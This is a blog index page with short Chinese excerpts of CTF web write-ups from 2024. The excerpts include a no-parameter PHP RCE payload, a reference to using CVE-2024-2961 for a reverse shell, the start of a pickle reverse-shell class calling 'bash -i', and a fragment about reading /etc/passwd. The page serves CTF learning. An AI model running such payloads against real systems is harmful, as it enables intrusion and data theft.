摘要: 前言 这个其实不算啥大洞,主要是我遇到两次了,第一次是在黄河流域做那个题的时候,还有一次是ctfshow西瓜杯的题,做到了gxngxngxn师傅出的套皮。 就以这道ezphp入手吧。 分析&EXP 一看传参传个gxngxngxn就能读/etc/passwd,事实也的确如此。 但是我们显然是要做到打这 阅读全文
posted @ 2024-07-18 22:34 Eddie_Murphy 阅读(291) 评论(0) 推荐(0) 编辑
摘要: 前言 看了春秋杯夏季赛wp,发现那道wordpress就是先扫插件然后找到任意文件读取部分,用CVE-2024-2961来实现反弹shell或直接读操作,觉得这个点有点意思,跟前面学的侧信道、php-filter-chains啥的感觉有所关联,而且放假了也比较闲,于是写一篇文章来学学看看。 首先,这 阅读全文
posted @ 2024-07-11 15:56 Eddie_Murphy 阅读(498) 评论(0) 推荐(0) 编辑
摘要: 上午答辩完小学期结束了,刚好有题打,下午上线打打玩玩喽~ Hijack <?php highlight_file(__FILE__); error_reporting(E_ALL); ini_set('display_errors', 1); function filter($a) { $patte 阅读全文
posted @ 2024-07-05 17:50 Eddie_Murphy 阅读(315) 评论(0) 推荐(0) 编辑
摘要: 记录第二次线下 CISCN华北分区赛 说实话 队友真的给力带飞 但是断网环境下压力真的很大 我去年十一月进队当现役 没学多久就被队长叫去打国赛 而且还被指导老师点名去打到决赛一等奖 考完计网就坐车去天津 打完回去第二天还有个操作系统期末考试 打的前一天晚上我们两个队都没睡好 打pwn的队长甚至一夜没 阅读全文
posted @ 2024-06-29 15:17 Eddie_Murphy 阅读(191) 评论(0) 推荐(0) 编辑
摘要: admin/admin弱密码登录, 扫网页发现/js/manage.js,访问得到js混淆代码,直接gpt梭: window.onload = function() { fetch('/source') .then(response => response.json()) .then(data => 阅读全文
posted @ 2024-05-27 17:59 Eddie_Murphy 阅读(183) 评论(0) 推荐(0) 编辑
摘要: 被pwn✌翰青带飞力 最高的时候打到了总榜第三,tql,虽然后面闲鱼老哥发力了,py太明目张胆给分数刷下去了,最后黑灯摆了就没交了,掉到60几了。 这里不谈其他,就谈谈web吧。 Simple_php ban了很多命令,但是没有ban掉diff和dd,可以使用diff读目录,dd读文件: 读根目录: 阅读全文
posted @ 2024-05-20 13:18 Eddie_Murphy 阅读(902) 评论(0) 推荐(0) 编辑
摘要: Please_RCE_Me 方法很多,我用的无参数RCE方法读的: 这个正则形同虚设,大写就绕了。 task=var_dump(scandir(dirname(chdir(dirname(getcwd())))));&flag=Please_give_me_flag task=show_source 阅读全文
posted @ 2024-05-14 14:14 Eddie_Murphy 阅读(19) 评论(0) 推荐(0) 编辑
摘要: 没啥事干,打着玩玩。 练武题 还没想好名字的塔防游戏 打了半天啥也没有,下载源码直接搜: 牛逼。 结合提示,猜出加上页面那个一起字母大写刚好十八位: ISCC{MDWTSGTMMSSSPFRMMM} 代码审计 [De1ctf 2019]SSRF Me原题:[De1ctf 2019]SSRF Me(哈 阅读全文
posted @ 2024-05-13 20:42 Eddie_Murphy 阅读(54) 评论(0) 推荐(0) 编辑
摘要: myfavorPython 无waf,pickle反弹shell。 import pickle import base64 import os class Exp(object): def __reduce__(self): return (os.system,("bash -c \"bash -i 阅读全文
posted @ 2024-05-13 16:43 Eddie_Murphy 阅读(31) 评论(0) 推荐(0) 编辑
摘要: 很多可以蚁剑插件自己做,因为本来就是蚁剑实验室的靶场,这里有些也就用手工方法,方便掌握原理。 LD_PRELOAD 看题目一眼环境变量劫持。 蚁剑可以连,但是终端命令全被ban了。 访问/?ant=phpinfo(); 查看禁用函数: pcntl_alarm,pcntl_fork,pcntl_wai 阅读全文
posted @ 2024-05-12 20:54 Eddie_Murphy 阅读(123) 评论(0) 推荐(0) 编辑